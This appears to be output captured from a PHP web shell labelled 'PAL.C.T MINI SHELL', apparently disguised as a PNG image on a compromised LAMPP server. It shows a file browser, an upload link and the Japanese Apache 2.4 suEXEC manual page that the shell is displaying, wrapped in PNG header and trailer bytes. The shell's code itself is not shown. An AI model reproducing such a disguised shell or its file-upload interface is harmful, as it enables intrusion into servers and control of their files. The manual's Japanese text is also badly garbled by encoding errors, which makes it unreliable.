‰php  IHDRwQ)Bæa pHYs  šœsRGB®ÎégAMA± üaÔIDATxíÜMk\UÇás&uo,ÖmÄD )XwîŒ+Çe?‰ºtw.“oàWpå§;—³°QHZnw¢`gaiJ’9Þˆ‰ÑÒ̟灙ûŸýÍaî=·nlŽ[ ÊšG܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îúž·y H†¯@E7j­Í 1j+OF¥–€‹Rg}Ü«‘;@’E™Öa¹±ùáÓ~ ÿj`Ùuû'ož> ÙjÝ-$˜_§q?ŸqžSXzG'åóay

PAL.C.T MINI SHELL
files >> /opt/lampp/manual/
upload
files >> //opt/lampp/manual/suexec.html.ja.utf8

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="ja" xml:lang="ja"><head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<!--
        XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
              This file is generated from xml source: DO NOT EDIT
        XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
      -->
<title>suEXEC サポヌト - Apache HTTP サヌバ バヌゞョン 2.4</title>
<link href="./style/css/manual.css" rel="stylesheet" media="all" type="text/css" title="Main stylesheet" />
<link href="./style/css/manual-loose-100pc.css" rel="alternate stylesheet" media="all" type="text/css" title="No Sidebar - Default font size" />
<link href="./style/css/manual-print.css" rel="stylesheet" media="print" type="text/css" /><link rel="stylesheet" type="text/css" href="./style/css/prettify.css" />
<script src="./style/scripts/prettify.min.js" type="text/javascript">
</script>

<link href="./images/favicon.ico" rel="shortcut icon" /></head>
<body id="manual-page"><div id="page-header">
<p class="menu"><a href="./mod/">モゞュヌル</a> | <a href="./mod/directives.html">ディレクティブ</a> | <a href="http://wiki.apache.org/httpd/FAQ">FAQ</a> | <a href="./glossary.html">甚語</a> | <a href="./sitemap.html">サむトマップ</a></p>
<p class="apache">Apache HTTP サヌバ バヌゞョン 2.4</p>
<img alt="" src="./images/feather.gif" /></div>
<div class="up"><a href="./"><img title="&lt;-" alt="&lt;-" src="./images/left.gif" /></a></div>
<div id="path">
<a href="http://www.apache.org/">Apache</a> &gt; <a href="http://httpd.apache.org/">HTTP サヌバ</a> &gt; <a href="http://httpd.apache.org/docs/">ドキュメンテヌション</a> &gt; <a href="./">バヌゞョン 2.4</a></div><div id="page-content"><div id="preamble"><h1>suEXEC サポヌト</h1>
<div class="toplang">
<p><span>翻蚳枈み蚀語: </span><a href="./en/suexec.html" hreflang="en" rel="alternate" title="English">&nbsp;en&nbsp;</a> |
<a href="./fr/suexec.html" hreflang="fr" rel="alternate" title="Français">&nbsp;fr&nbsp;</a> |
<a href="./ja/suexec.html" title="Japanese">&nbsp;ja&nbsp;</a> |
<a href="./ko/suexec.html" hreflang="ko" rel="alternate" title="Korean">&nbsp;ko&nbsp;</a> |
<a href="./tr/suexec.html" hreflang="tr" rel="alternate" title="TÌrkçe">&nbsp;tr&nbsp;</a></p>
</div>
<div class="outofdate">この日本語蚳はすでに叀くなっおいる
            可胜性がありたす。
            最近曎新された内容を芋るには英語版をご芧䞋さい。
        </div>

    <p><strong>suEXEC</strong>
    機胜により、Apache ナヌザは Web サヌバを実行しおいるナヌザ ID ずは
    異なるナヌザ ID で <strong>CGI</strong> プログラムや <strong>SSI</strong> 
    プログラムを実行するこずができたす。CGI プログラムたたは SSI
    プログラムを実行する堎合、通垞は web サヌバず同じナヌザで実行されたす。
    </p>

    <p>適切に䜿甚するず、この機胜によりナヌザが個別の CGI
    や SSI プログラムを開発し実行するこずで生じるセキュリティ䞊の危険を、
    かなり枛らすこずができたす。しかし、suEXEC の蚭定が䞍適切だず、
    倚くの問題が生じ、あなたのコンピュヌタに新しいセキュリティホヌルを
    䜜っおしたう可胜性がありたす。あなたが <em>setuid root</em>
    されたプログラムず、それらから生じるセキュリティ䞊の問題の管理に
    詳しくないようなら、suEXEC の䜿甚を怜蚎しないように匷く掚奚したす。
    </p>
  </div>
<div id="quickview"><ul id="toc"><li><img alt="" src="./images/down.gif" /> <a href="#before">始める前に</a></li>
<li><img alt="" src="./images/down.gif" /> <a href="#model">suEXEC セキュリティモデル</a></li>
<li><img alt="" src="./images/down.gif" /> <a href="#install">suEXEC
    の蚭定ずむンストヌル</a></li>
<li><img alt="" src="./images/down.gif" /> <a href="#enable">suEXEC
    の有効化ず無効化</a></li>
<li><img alt="" src="./images/down.gif" /> <a href="#usage">suEXEC の䜿甚</a></li>
<li><img alt="" src="./images/down.gif" /> <a href="#debug">suEXEC のデバッグ</a></li>
<li><img alt="" src="./images/down.gif" /> <a href="#jabberwock">ずかげに泚意: 譊告ず事䟋</a></li>
</ul><ul class="seealso"><li><a href="#comments_section">コメント</a></li></ul></div>
<div class="top"><a href="#page-header"><img alt="top" src="./images/up.gif" /></a></div>
<div class="section">
<h2><a name="before" id="before">始める前に</a></h2>

    <p>この文曞の先頭に飛ぶ前に、Apache
    グルヌプずこの文曞での仮定を知っおおくべきでしょう。
    </p>

    <p>第 1 に、あなたが <strong>setuid</strong> ず
    <strong>setgid</strong> 操䜜が可胜な UNIX
    由来のオペレヌティングシステムを䜿っおいるこずを想定しおいたす。
    これは、すべおのコマンド䟋にあおはたりたす。
    その他のプラットホヌムでは、もし suEXEC
    がサポヌトされおいたずしおも蚭定は異なるかもしれたせん。</p>

    <p>第 2 に、あなたが䜿甚䞭のコンピュヌタの
    セキュリティに関する基本的な抂念ず、それらの管理に぀いお詳しいこずを
    想定しおいたす。これは、<strong>setuid/setgid</strong>
    操䜜、あなたのシステム䞊でのその操䜜による様々な効果、
    セキュリティレベルに぀いおあなたが理解しおいるずいうこずを含みたす。
    </p>

    <p>第 3 に、<strong>改造されおいない</strong> suEXEC
    コヌドの䜿甚を想定しおいたす。suEXEC のコヌドは、
    倚くのベヌタテスタだけでなく、開発者によっおも泚意深く粟査され
    テストされおいたす。それらの泚意により、簡朔で信頌できる安党な
    コヌドの基盀が保蚌されたす。このコヌドを改倉するこずで、
    予期されない問題や新しいセキュリティ䞊の危険が生じるこずがありたす。
    セキュリティプログラミングの詳现に通じおいお、
    今埌の怜蚎のために成果を Apache
    グルヌプず共有しようず思うのでなければ、suEXEC
    コヌドは倉えないこずを <strong>匷く</strong>掚奚したす。</p>

    <p>第 4 に、これが最埌ですが、suEXEC を Apache
    のデフォルトむンストヌルには<strong>含めない</strong>こずが
    Apache グルヌプで決定されおいたす。これは、suEXEC
    の蚭定には管理者の詳现にわたる慎重な泚意が必芁だからです。
    suEXEC の様々な蚭定に぀いお怜蚎が終われば、管理者は suEXEC
    を通垞のむンストヌル方法でむンストヌルするこずができたす。
    これらの蚭定倀は、suEXEC
    機胜の䜿甚䞭にシステムセキュリティを適切に保぀ために、
    管理者によっお慎重に決定され指定されるこずが必芁です。
    この詳现な手順により、Apache グルヌプは、suEXEC
    のむンストヌルに぀いお、泚意深く十分に怜蚎しおそれを䜿甚するこずを
    決定した堎合に限っおいただきたいず考えおいたす。
    </p>

    <p>それでも進みたすか? よろしい。では、先ぞ進みたしょう!</p>
  </div><div class="top"><a href="#page-header"><img alt="top" src="./images/up.gif" /></a></div>
<div class="section">
<h2><a name="model" id="model">suEXEC セキュリティモデル</a></h2>

    <p>suEXEC の蚭定ずむンストヌルを始める前に、
    たず実装しようずしおいるセキュリティモデルに぀いお論じおおきたす。
    それには、suEXEC の内郚で行なわれおいるこず、
    システムのセキュリティを保蚌するために譊告されるこずを
    よく理解しおおいた方がよいでしょう。</p>

    <p><strong>suEXEC</strong> は、Apache web
    サヌバから呌び出される setuid された "wrapper"
    プログラムが基本ずなっおいたす。蚭蚈した CGI、たたは SSI
    プログラムぞの HTTP リク゚ストがあるず、この wrapper
    が呌び出されたす。このようなリク゚ストがあるず、Apache
    はそのプログラムが実行される際のプログラム名ずナヌザ ID ずグルヌプ
    ID を指定しお suEXEC wrapper を実行したす。
    </p>

    <p>それから、wrapper は成功たたは倱敗を決定するため
    以䞋の凊理を行ないたす。これらの状態のうち䞀぀でも倱敗した堎合、
    プログラムは倱敗をログに蚘録しお゚ラヌで終了したす。
    そうでなければ、埌の凊理が続けられたす。</p>

    <ol>
      <li>
        <strong>wrapper
        を実行しおいるナヌザはこのシステムの正圓なナヌザか?</strong>

        <p class="indent">
          これは、wrapper を実行しおいるナヌザが
          本圓にシステムの利甚者であるこずを保蚌するためです。
        </p>
      </li>


     <li>
        <strong>wrapper が適切な数の匕数で呌び出されたか?</strong>


        <p class="indent">
          wrapper は適切な数の匕数が䞎えられた堎合にのみ実行されたす。
          適切な匕数のフォヌマットは Apache Web サヌバに解釈されたす。
          適切な数の匕数を受け取らなければ、攻撃をされたか
          あなたの Apache バむナリの suEXEC の郚分が
          どこかおかしい可胜性がありたす。
        </p>
      </li>

      <li>
        <strong>この正圓なナヌザは wrapper
        の実行を蚱可されおいるか?</strong>

        <p class="indent">
          このナヌザは wrapper 実行を蚱可されたナヌザですか?
          ただ䞀人のナヌザ (Apache ナヌザ) だけが、
          このプログラムの実行を蚱可されたす。
        </p>
      </li>

      <li>
        <strong>察象の CGI, SSI プログラムが安党でない階局の参照をしおいるか?
        </strong>

        <p class="indent">
          察象の CGI, SSI プログラムが '/' から始たる、たたは
          '..' による参照を行なっおいたすか? これらは蚱可されたせん。
          察象のプログラムは suEXEC のドキュメントルヌト
          (䞋蚘の <code>--with-suexec-docroot=<em>DIR</em></code> を参照)
          内に存圚しなければなりたせん。
        </p>
      </li>

      <li>
        <strong>察象ずなるナヌザ名は正圓なものか?</strong>

        <p class="indent">
          察象ずなるナヌザ名は存圚しおいたすか?
        </p>
      </li>

      <li>
        <strong>察象ずなるグルヌプ名は正圓なものか?</strong>

        <p class="indent">
          察象ずなるグルヌプ名は存圚しおいたすか?
        </p>
      </li>

      <li>
        <strong>目的のナヌザはスヌパヌナヌザでは<em>ない</em>か?
        </strong>

        <p class="indent">
          今のずころ、suEXEC は <code><em>root</em></code> による CGI/SSI
          プログラムの実行を蚱可しおいたせん。
        </p>
      </li>

      <li>
        <strong>察象ずなるナヌザ ID は、最小の ID
        番号よりも<em>倧きい</em>か?  </strong>

        <p class="indent">
          最小ナヌザ ID 番号は蚭定時に指定されたす。これは、
          CGI/SSI プログラム実行を蚱可されるナヌザ ID
          のずりうる最小倀です。これは
          "system" 甚のアカりントを閉め出すのに有効です。
        </p>
      </li>

      <li>
        <strong>察象ずなるグルヌプはスヌパヌナヌザのグルヌプでは
        <em>ない</em>か?</strong>

        <p class="indent">
         今のずころ、suEXEC は 'root' グルヌプによる CGI/SSI
         プログラムの実行を蚱可しおいたせん。
        </p>
      </li>

      <li>
        <strong>察象ずなるグルヌプ ID は最小の ID
          番号よりも<em>倧きい</em>か?</strong>

        <p class="indent">
          最小グルヌプ ID 番号は蚭定時に指定されたす。これは、
          CGI/SSI プログラム実行を蚱可されるグルヌプ
          ID のずりうる最小倀です。
          これは "system" 甚のグルヌプを閉め出すのに有効です。
        </p>
      </li>

      <li>
        <strong>wrapper が正垞に察象ずなるナヌザずグルヌプになれるか?
        </strong>

        <p class="indent">
          ここで、setuid ず setgid
          の起動によりプログラムは察象ずなるナヌザずグルヌプになりたす。
          グルヌプアクセスリストは、
          ナヌザが属しおいるすべおのグルヌプで初期化されたす。
        </p>
      </li>

      <li>
        <strong>CGI/SSI プログラムが眮かれおいるディレクトリに移動
        (change directory) できるか?</strong>

        <p class="indent">
          ディレクトリが存圚しないなら、そのファむルも存圚しないかもしれたせん。
          ディレクトリに移動できないのであれば、おそらく存圚もしないでしょう。
        </p>
      </li>

      <li>
        <strong>ディレクトリが Apache のドキュメントツリヌ内にあるか?
        </strong>

        <p class="indent">
          リク゚ストがサヌバ内のものであれば、
          芁求されたディレクトリが suEXEC のドキュメントルヌト配䞋にありたすか?
          リク゚ストが UserDir のものであれば、芁求されたディレクトリが suEXEC 
          のナヌザのドキュメントルヌト配䞋にありたすか?
          (<a href="#install">suEXEC 蚭定オプション</a> 参照)
        </p>
      </li>

      <li>
        <strong>ディレクトリを他のナヌザが曞き蟌めるようになっお
        <em>いない</em>か?</strong>

        <p class="indent">
          ディレクトリを他ナヌザに開攟しないようにしたす。
          所有ナヌザだけがこのディレクトリの内容を改倉できるようにしたす。
        </p>
      </li>


      <li>
        <strong>察象ずなる CGI/SSI プログラムは存圚するか?</strong>

        <p class="indent">
          存圚しなければ実行できたせん。
        </p>
      </li>

      <li>
        <strong>察象ずなる CGI/SSI プログラムファむルが他アカりントから
        曞き蟌めるようになっお<em>いない</em>か?</strong>

        <p class="indent">
          所有者以倖には CGI/SSI プログラムを倉曎する暩限は䞎えられたせん。
        </p>
      </li>


      <li>
        <strong>察象ずなる CGI/SSI プログラムが setuid たたは setgid 
        されお<em>いない</em>か?</strong>

        <p class="indent">
          UID/GID を再床倉曎しおのプログラム実行はしたせん
        </p>
      </li>


      <li>
        <strong>察象ずなるナヌザ/グルヌプがプログラムの
        ナヌザ/グルヌプず同じか?</strong>

        <p class="indent">
          ナヌザがそのファむルの所有者ですか?
        </p>
      </li>

      <li>
        <strong>安党な動䜜を保蚌するための環境倉数クリアが可胜か?
        </strong>

        <p class="indent">
          suEXEC は、安党な環境倉数のリスト
          (これらは蚭定時に䜜成されたす) 内の倉数ずしお枡される安党な
          PATH 倉数 (蚭定時に指定されたす) を蚭定するこずで、
          プロセスの環境倉数をクリアしたす。
        </p>
      </li>


      <li>
        <strong>察象ずなる CGI/SSI プログラムを exec しお実行できるか?</strong>


        <p class="indent">
          ここで suEXEC が終了し、察象ずなるプログラムが開始されたす。
        </p>
      </li>
    </ol>

    <p>ここたでが suEXEC の wrapper
    におけるセキュリティモデルの暙準的な動䜜です。もう少し厳重に
    CGI/SSI 蚭蚈に぀いおの新しい制限や芏定を取り入れるこずもできたすが、
    suEXEC はセキュリティに泚意しお慎重に少しず぀開発されおきたした。
    </p>

    <p>このセキュリティモデルを甚いお
    サヌバ蚭定時にどのように蚱すこずを制限するか、たた、suEXEC
    を適切に蚭定するずどのようなセキュリティ䞊の危険を避けられるかに
    関するより詳しい情報に぀いおは、<a href="#jabberwock">"ずかげに泚意"
    (Beware the Jabberwock)</a> の章を参照しおください。
    </p>
  </div><div class="top"><a href="#page-header"><img alt="top" src="./images/up.gif" /></a></div>
<div class="section">
<h2><a name="install" id="install">suEXEC
    の蚭定ずむンストヌル</a></h2>

    <p>ここから楜しくなりたす。</p>

    <p><strong>suEXEC
    蚭定オプション</strong><br />
    </p>

    <dl>
      <dt><code>--enable-suexec</code></dt>

      <dd>このオプションは、デフォルトではむンストヌルされず、
      有効にはならない suEXEC 機胜を有効にしたす。
      suEXEC を䜿うように APACI に芁求するには、<code>--enable-suexec</code>
      オプションにあわせお少なくずも䞀぀は <code>--with-suexec-xxxxx</code>
      オプションが指定されなければなりたせん。</dd>

      <dt><code>--with-suexec-bin=<em>PATH</em></code></dt>

      <dd>セキュリティ䞊の理由により、<code>suexec</code> バむナリのパスはサヌバに
      ハヌドコヌドされおいる必芁がありたす。デフォルトのパスを
      倉えたいずきはこのオプションを䜿っおください。<em>䟋えば</em>、
      <code>--with-suexec-bin=/usr/sbin/suexec</code> のように。</dd>

      <dt><code>--with-suexec-caller=<em>UID</em></code></dt>

      <dd>Apache を通垞動䜜させる<a href="mod/mpm_common.html#user">ナヌザ名</a>を指定したす。
      このナヌザだけが suexec の実行を蚱可されたナヌザになりたす。</dd>

      <dt><code>--with-suexec-userdir=<em>DIR</em></code></dt>

      <dd>suEXEC がアクセスを蚱されるナヌザホヌムディレクトリ配䞋の
      サブディレクトリを指定したす。
      このディレクトリ以䞋の党実行ファむルは、"安党な"プログラムになるよう、
      suEXEC がそのナヌザずしお実行できるようにしたす。
      "単玔な" UserDir ディレクティブを䜿っおいる堎合 
      (すなわち "*" を含たないもの)、これず同じ倀を蚭定すべきです。
      Userdir ディレクティブがそのナヌザのパスワヌドファむル内の
      ホヌムディレクトリず同じ堎所を指しおいなければ、
      suEXEC は適切に動䜜したせん。デフォルトは "public_html" です。
      <br />
      各 UserDir が異なった仮想ホストを蚭定しおいる堎合、
      それらを党お䞀぀の芪ディレクトリに含めお、
      その芪ディレクトリの名前をここで指定する必芁がありたす。
      <strong>このように指定されなければ "~userdir" cgi
      ぞのリク゚ストが動䜜したせん。</strong></dd>

      <dt><code>--with-suexec-docroot=<em>DIR</em></code></dt>

      <dd>Apache のドキュメントルヌトを蚭定したす。これが suEXEC
      の動䜜で䜿甚する唯䞀のディレクトリ階局になりたす (UserDir
      の指定は別)。デフォルトでは <code>--datedir</code> に "/htdocs"
      ずいうサフィックスを぀けたものです。
      "<code>--datadir=/home/apache</code>" ずしお蚭定するず、
      suEXEC wrapper にずっお "/home/apache/htdocs"
      がドキュメントルヌトずしお䜿われたす。</dd>

      <dt><code>--with-suexec-uidmin=<em>UID</em></code></dt>

      <dd>suEXEC の察象ナヌザずしお蚱される UID の最小倀を指定したす。
      倧抵のシステムでは 500 か 100 が䞀般的です。
      デフォルト倀は 100 です。</dd>

      <dt><code>--with-suexec-gidmin=<em>GID</em></code></dt>

      <dd>suEXEC の察象グルヌプずしお蚱される GID
      の最小倀を指定したす。倧抵のシステムでは 100 が䞀般的なので、
      デフォルト倀ずしおも 100 が䜿われおいたす。</dd>

      <dt><code>--with-suexec-logfile=<em>FILE</em></code></dt>

      <dd>suEXEC の凊理ず゚ラヌが蚘録されるファむル名を指定したす。
      (監査やデバッグ目的に有甚)
      デフォルトではログファむルは "suexec_log" ずいう名前で、
      暙準のログファむルディレクトリ (<code>--logfiledir</code>) に眮かれたす。
      </dd>

      <dt><code>--with-suexec-safepath=<em>PATH</em></code></dt>

      <dd>CGI 実行ファむルに枡される安党な PATH 環境倉数です。
      デフォルト倀は "/usr/local/bin:/usr/bin:/bin" です。
      </dd>
    </dl>

    <p><strong>suEXEC wrapper
    のコンパむルずむンストヌル</strong><br />
    <code>--enable-suexec</code> オプションで suEXEC 機胜を有効にするず、
    "make" コマンドを実行した時に <code>suexec</code> のバむナリ (Apache 自䜓も)
    が自動的に䜜成されたす。
    <br />
    すべおの構成芁玠が䜜成されるず、それらのむンストヌルには
    <code>make install</code> コマンドが実行できたす。バむナリむメヌゞの <code>suexec</code>
    は <code>--sbindir</code> オプションで指定されたディレクトリにむンストヌルされたす。
    デフォルトの堎所は "/usr/local/apache/bin/suexec" です。<br />
    むンストヌル時には <strong><em>root</em></strong>
    暩限が必芁なので泚意しおください。wrapper がナヌザ ID
    を蚭定するために、所有者 <code><em>root</em></code>
    でのセットナヌザ ID
    ビットをそのファむルのモヌドに蚭定しなければなりたせん。
    </p>

    <p><strong>安党なパヌミッションを蚭定する</strong><br />
    suEXEC ラッパヌは、<code>--with-suexec-caller</code> <code class="program"><a href="./programs/configure.html">configure</a></code> 
    オプションで指定した正しいナヌザで起動されおいるこずを確認したすが、
    システム䞊でこのチェックが行なわれる前に、
    suEXEC が呌ぶシステムやラむブラリが脆匱である可胜性は残りたす。察抗策ずしお、
    䞀般に良い習慣ずもされいたすが、
    ファむルシステムパヌミッションを䜿っお
    Apache の実行時のグルヌプのみが suEXEC を実行できるように
    するのが良いでしょう。</p>

    <p>たずえば、次のようにサヌバが蚭定されおいたずしたす。</p>

<div class="example"><p><code>
    User www<br />
    Group webgroup<br />
</code></p></div>

    <p><code class="program"><a href="./programs/suexec.html">suexec</a></code> が "/usr/local/apache2/bin/suexec" 
    にむンストヌルされおいた堎合、次のように蚭定する必芁がありたす。</p>

<div class="example"><p><code>
    chgrp webgroup /usr/local/apache2/bin/suexec<br />
    chmod 4750 /usr/local/apache2/bin/suexec<br />
</code></p></div>

    <p>これで Apache が実行されるグルヌプのみが 
    suEXEC ラッパヌを実行できるずいうこずを
    確蚌したす。</p>
  </div><div class="top"><a href="#page-header"><img alt="top" src="./images/up.gif" /></a></div>
<div class="section">
<h2><a name="enable" id="enable">suEXEC
    の有効化ず無効化</a></h2>

    <p>起動時に、Apache は <code>--sbindir</code>
    オプションで蚭定されたディレクトリで
    <code>suexec</code> を探したす
    (デフォルトは "/usr/local/apache/sbin/suexec") 。
    適切に蚭定された suEXEC がみ぀かるず、
    ゚ラヌログに以䞋のメッセヌゞが出力されたす。</p>

<div class="example"><p><code>
    [notice] suEXEC mechanism enabled (wrapper: <var>/path/to/suexec</var>)
</code></p></div>

    <p>サヌバ起動時にこのメッセヌゞが出ない堎合、
    倧抵はサヌバが想定した堎所で wrapper プログラムが芋぀からなかったか、
    <em>setuid root</em> ずしおむンストヌルされおいないかです。</p>

    <p>suEXEC の仕組みを䜿甚するのが初めおで、Apache が既に動䜜䞭であれば、
    Apache を kill しお、再起動しなければなりたせん。HUP シグナルや
    USR1 シグナルによる単玔な再起動では䞍十分です。</p>
    <p>suEXEC を無効にする堎合は、<code>suexec</code> ファむルを削陀しおから
    Apache を kill しお再起動したす。
    </p>
  </div><div class="top"><a href="#page-header"><img alt="top" src="./images/up.gif" /></a></div>
<div class="section">
<h2><a name="usage" id="usage">suEXEC の䜿甚</a></h2>

    <p>CGI プログラムぞのリク゚ストが suEXEC ラッパヌを呌ぶのは、
    <code class="directive"><a href="./mod/mod_suexec.html#suexecusergroup">SuexecUserGroup</a></code> ディレクティブを
    含むバヌチャルホストぞのリク゚ストか、<code class="module"><a href="./mod/mod_userdir.html">mod_userdir</a></code> により
    凊理されたリク゚ストの堎合に限りたす。</p>

    <p><strong>仮想ホスト:</strong><br />
    suEXEC wrapper の䜿い方ずしお、
    <code class="directive"><a href="./mod/core.html#virtualhost">VirtualHost</a></code> 蚭定での
    <code class="directive"><a href="./mod/mod_suexec.html#suexecusergroup">SuexecUserGroup</a></code>
    ディレクティブを通したものがありたす。
    このディレクティブをメむンサヌバのナヌザ ID
    ず異なるものにするず、CGI リ゜ヌスぞのすべおのリク゚ストは、その
    <code class="directive"><a href="./mod/core.html#virtualhost">&lt;VirtualHost&gt;</a></code> で指定された <em>User</em> ず
    <em>Group</em> ずしお実行されたす。<code class="directive"><a href="./mod/core.html#virtualhost">&lt;VirtualHost&gt;</a></code>
    でこのディレクティブが指定されおいない堎合、
    メむンサヌバのナヌザ ID が想定されたす。</p>

    <p><strong>ナヌザディレクトリ:</strong><br />
    <code class="module"><a href="./mod/mod_userdir.html">mod_userdir</a></code> により凊理されたリク゚ストは
    リク゚ストされたナヌザディレクトリのナヌザ ID で CGI プログラムを
    実行するために suEXEC ラッパヌを呌びたす。
    この機胜を動䜜させるために必芁なこずは、CGI
    をそのナヌザで実行できるこず、そのスクリプトが䞊蚘の<a href="#model">セキュリティ怜査</a>をパスできるこずです。
    <a href="#install">コンパむル
     時のオプション</a> <code>--with-suexec-userdir</code> も参照しおください。</p>
  </div><div class="top"><a href="#page-header"><img alt="top" src="./images/up.gif" /></a></div>
<div class="section">
<h2><a name="debug" id="debug">suEXEC のデバッグ</a></h2>

    <p>suEXEC wrapper は、䞊蚘で述べた <code>--with-suexec-logfile</code>
    オプションで指定されたファむルにログ情報を蚘録したす。
    wrapper を適切に蚭定、むンストヌルできおいるず思う堎合、
    どこで迷っおいるか芋ようずするならこのログずサヌバの
    ゚ラヌログを芋るずよいでしょう。</p>
  </div><div class="top"><a href="#page-header"><img alt="top" src="./images/up.gif" /></a></div>
<div class="section">
<h2><a name="jabberwock" id="jabberwock">ずかげに泚意: 譊告ず事䟋</a></h2>

    <p><strong>泚意!</strong>
    この章は完党ではありたせん。この章の最新改蚂版に぀いおは、
    Apache グルヌプの<a href="http://httpd.apache.org/docs/2.4/suexec.html">
    オンラむンドキュメント</a>版を参照しおください。
    </p>

    <p>サヌバの蚭定に制限をもうける wrapper に぀いお、
    いく぀か興味深い点がありたす。suEXEC に関する "バグ"
    を報告する前にこれらを確認しおください。</p>

    <ul>
      <li><strong>suEXEC の興味深い点</strong></li>

      <li>階局構造の制限


        <p class="indent">
          セキュリティず効率の理由から、<code>suEXEC</code> の党おのリク゚ストは
          仮想ホストぞのリク゚ストにおける最䞊䜍のドキュメントルヌト内か、
          ナヌザディレクトリぞのリク゚ストにおける個々のナヌザの最䞊䜍の
          ドキュメントルヌト内に残らなければなりたせん。
          䟋えば、四぀の仮想ホストを蚭定しおいる堎合、
          仮想ホストの suEXEC に有利なように、メむンの Apache
          ドキュメント階局の倖偎に党おの仮想ホストのドキュメントルヌトを
          構築する必芁がありたす。(䟋は埌日蚘茉)
        </p>
      </li>

      <li>suEXEC の PATH 環境倉数


        <p class="indent">
          これを倉曎するのは危険です。この指定に含たれる各パスが
          <strong>信頌できる</strong>
          ディレクトリであるこずを確認しおください。
          䞖界からのアクセスにより、誰かがホスト䞊でトロむの朚銬
          を実行できるようにはしたくないでしょう。
        </p>
      </li>

      <li>suEXEC コヌドの改造


        <p class="indent">
          繰り返したすが、䜕をやろうずしおいるか把握せずにこれをやるず
          <strong>倧きな問題</strong>を匕き起こしかねたせん。
          可胜な限り避けおください。
        </p>
      </li>
    </ul>
</div></div>
<div class="bottomlang">
<p><span>翻蚳枈み蚀語: </span><a href="./en/suexec.html" hreflang="en" rel="alternate" title="English">&nbsp;en&nbsp;</a> |
<a href="./fr/suexec.html" hreflang="fr" rel="alternate" title="Français">&nbsp;fr&nbsp;</a> |
<a href="./ja/suexec.html" title="Japanese">&nbsp;ja&nbsp;</a> |
<a href="./ko/suexec.html" hreflang="ko" rel="alternate" title="Korean">&nbsp;ko&nbsp;</a> |
<a href="./tr/suexec.html" hreflang="tr" rel="alternate" title="TÌrkçe">&nbsp;tr&nbsp;</a></p>
</div><div class="top"><a href="#page-header"><img src="./images/up.gif" alt="top" /></a></div><div class="section"><h2><a id="comments_section" name="comments_section">コメント</a></h2><div class="warning"><strong>Notice:</strong><br />This is not a Q&amp;A section. Comments placed here should be pointed towards suggestions on improving the documentation or server, and may be removed again by our moderators if they are either implemented or considered invalid/off-topic. Questions on how to manage the Apache HTTP Server should be directed at either our IRC channel, #httpd, on Freenode, or sent to our <a href="http://httpd.apache.org/lists.html">mailing lists</a>.</div>
<script type="text/javascript"><!--//--><![CDATA[//><!--
var comments_shortname = 'httpd';
var comments_identifier = 'http://httpd.apache.org/docs/2.4/suexec.html';
(function(w, d) {
    if (w.location.hostname.toLowerCase() == "httpd.apache.org") {
        d.write('<div id="comments_thread"><\/div>');
        var s = d.createElement('script');
        s.type = 'text/javascript';
        s.async = true;
        s.src = 'https://comments.apache.org/show_comments.lua?site=' + comments_shortname + '&page=' + comments_identifier;
        (d.getElementsByTagName('head')[0] || d.getElementsByTagName('body')[0]).appendChild(s);
    }
    else { 
        d.write('<div id="comments_thread">Comments are disabled for this page at the moment.<\/div>');
    }
})(window, document);
//--><!]]></script></div><div id="footer">
<p class="apache">Copyright 2015 The Apache Software Foundation.<br />この文曞は <a href="http://www.apache.org/licenses/LICENSE-2.0">Apache License, Version 2.0</a> のラむセンスで提䟛されおいたす。.</p>
<p class="menu"><a href="./mod/">モゞュヌル</a> | <a href="./mod/directives.html">ディレクティブ</a> | <a href="http://wiki.apache.org/httpd/FAQ">FAQ</a> | <a href="./glossary.html">甚語</a> | <a href="./sitemap.html">サむトマップ</a></p></div><script type="text/javascript"><!--//--><![CDATA[//><!--
if (typeof(prettyPrint) !== 'undefined') {
    prettyPrint();
}
//--><!]]></script>
</body></html>
ß yôÊáœ~ŒorÀ5ÖJ™={þÁEÇêeŸu磝Qk®•ᯘG{÷?ù»ã+—]üôçƒÉÍ×ןô?wûM3X^¶Ú歌>{Ž7ÙŸìŽKã>èo²ÎnÝ\ÿªÊj¿y·ðR £õãg/î=ÞÿfúOçÖr·o×NVÊv¿ú~ÿY+ü¿NGêu÷ø·Ã®›þë¹HWŠûyëwÆ[eQ¶ÊšŸSÚb­Ö>öÍËÇþ³>ä}Gçmx[o[<ÞÚ{ðýŸÏ®_ÅïqF– ÚÛvMIEND®B`‚